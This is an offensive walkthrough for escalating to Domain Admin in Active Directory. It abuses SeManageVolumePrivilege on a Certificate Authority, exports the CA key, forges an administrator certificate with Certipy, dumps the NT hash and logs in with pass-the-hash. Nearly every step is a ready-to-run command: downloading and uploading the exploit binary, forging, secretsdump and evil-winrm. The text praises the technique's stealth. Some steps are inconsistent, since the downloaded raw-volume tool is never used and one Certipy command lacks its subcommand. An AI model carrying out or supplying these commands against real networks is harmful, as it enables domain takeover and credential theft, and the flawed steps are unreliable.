Abusing the SeManageVolumePrivilege allows low-privileged users to perform raw volume access — often used for LSASS dumping. However, a more stealthy and devastating abuse is to extract Active Directory Certificate Services (AD CS) private keys directly from disk, then forge an administrator certificate for full domain escalation.
Requirements
-
Current user must have:
SeManageVolumePrivilege(check viawhoami /priv) -
Target system:
- Must be a Certificate Authority or have access to
.pfx/certs (likeC:\Windows\System32\certsrv\certenroll)
- Must be a Certificate Authority or have access to
Tools
SeManageVolumeExploit.exe— read raw volume data
https://github.com/CsEnox/SeManageVolumeExploitcertutil— native Windows tool for cert exportCertipy— abuse extracted CA to forge certificates
https://github.com/ly4k/Certipy
Steps
1. Confirm the privilege:
whoami /priv
Ensure:
SeManageVolumePrivilegeis Enabled
2. Download + Upload Exploit Tool
wget https://github.com/CsEnox/SeManageVolumeExploit/releases/download/public/SeManageVolumeExploit.exe
Upload it to the target via Evil-WinRM, SMB, or other methods.
3. Search for Certificates
Common path:
C:\Windows\System32\certsrv\certenroll
Look for .pfx, .crt, or .crl files.
dir C:\Windows\System32\certsrv\certenroll
Example output:
certificate-LTD-CA.crl
certificate-LTD-CA+.crl
Certificate-LTD-CA.crt
4. Export PFX from CA (With Private Key)
Use certutil:
certutil -exportPFX my "Certificate-LTD-CA" C:\users\youruser\desktop\ca.pfx
- Enter a password when prompted to protect the file.
- Download the file to your attack box.
5. Forge Admin Certificate
certipy-ad forge -ca-pfx ca.pfx -upn administrator@corp.local
Outputs:
administrator_forged.pfx
6. Authenticate as Domain Admin via Cert
timewrap corp.local certipy-ad -pfx administrator_forged.pfx -domain corp.local -dc-ip 10.10.10.10
timewrap is my custom bash script, that works same as faketime, timewrap corp.local - gets the time and use faketime.
- This uses PKINIT (Smartcard-style auth)
- Gets a TGT and saves it to
.ccache
7. Dump NT Hash of Administrator
timewrap corp.local certipy-ad auth -pfx administrator_forged.pfx -domain corp.local -dc-ip 10.10.10.10 --hashes
Or reuse .ccache:
export KRB5CCNAME=administrator.ccache
impacket-secretsdump -k corp.local/administrator@DC01.corp.local
Result
- You now have Administrator’s NT hash.
- Log in via
evil-winrm,pass-the-hash, or dump secrets.
evil-winrm -i 10.10.10.10 -u administrator -H <ntlm_hash>
Impact
- Stealthy — no LSASS injection
- Works post-exploitation on CA server
- Full DA access without credentials
Summary
| Step | Action |
|---|---|
| Have SeManageVolumePrivilege | Allows raw disk access |
| Locate CA cert + export | Export .pfx from system volume |
| Forge cert via Certipy | Become admin with valid certificate |
| PKINIT auth & NTLM hash | Gain full DA access |